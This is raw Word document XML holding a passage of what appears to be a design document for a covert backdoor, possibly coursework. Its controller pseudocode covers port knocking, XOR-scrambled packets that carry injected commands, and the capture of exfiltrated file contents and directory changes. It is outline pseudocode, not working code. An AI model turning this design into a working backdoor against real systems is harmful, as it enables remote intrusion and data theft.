          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                ... (other cases to be determined)</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/* Our Encryption/Decryption Method */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">XOR(item) // using XOR </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     put item into algorithm to scramble/unscramble</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     return scrambled/unscrambled data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="h.jfrs0b1d2coq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>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60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="144" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="144" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Puppeteer (Controller Pseudo) Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="144" w:type="dxa"/>
              <w:left w:w="144" w:type="dxa"/>
              <w:bottom w:w="144" w:type="dxa"/>
              <w:right w:w="144" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/* Some Global Variables */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Password = // some password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = // some predetermined pattern</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_to_output</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = // the file path to export changes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DIRECTORY_to_output</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = //the directory path to export changes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/* Our Main Function */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>void main ( ... )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     read arguments</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     read </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file</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 xml:space="preserve">     // we will always listen for responses</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>int</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listenID</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pthread_create</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>listener_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“response”))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>int</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commandID</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pthread_create</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>commander_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     join threads</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     Catch Ctrl + C</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     kill all threads</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     exit           </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>listener_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“response”)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     while true</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 xml:space="preserve">          listens for packets from certain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and port</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if packets match our signature</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               unscrambled = decrypt (password)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if unscrambled == Password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               if last packet, kill</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if packet contains file contents</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               export content to text </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>file_%DATE-RECEIVED</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if packet contains directory changes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               export content to text </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>directory_%DATE-RECEIVED</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>commander_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     while true</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 xml:space="preserve">          listens for packets from certain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and port</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if packets match our signature</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               unscrambled = decrypt (password)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if unscrambled == Password</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 xml:space="preserve">               if last packet, kill</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 xml:space="preserve">               if packets are validation packets</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lastRenderedPageBreak/>
              <w:t xml:space="preserve">                    knocker(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">) // do our port knocking first before send </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                    prepare packets</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                    XOR(packets with injected command)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                    send the packets</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 xml:space="preserve">               if packets are command results</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 xml:space="preserve">                    parse results</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                    print results to console</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>knocker(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
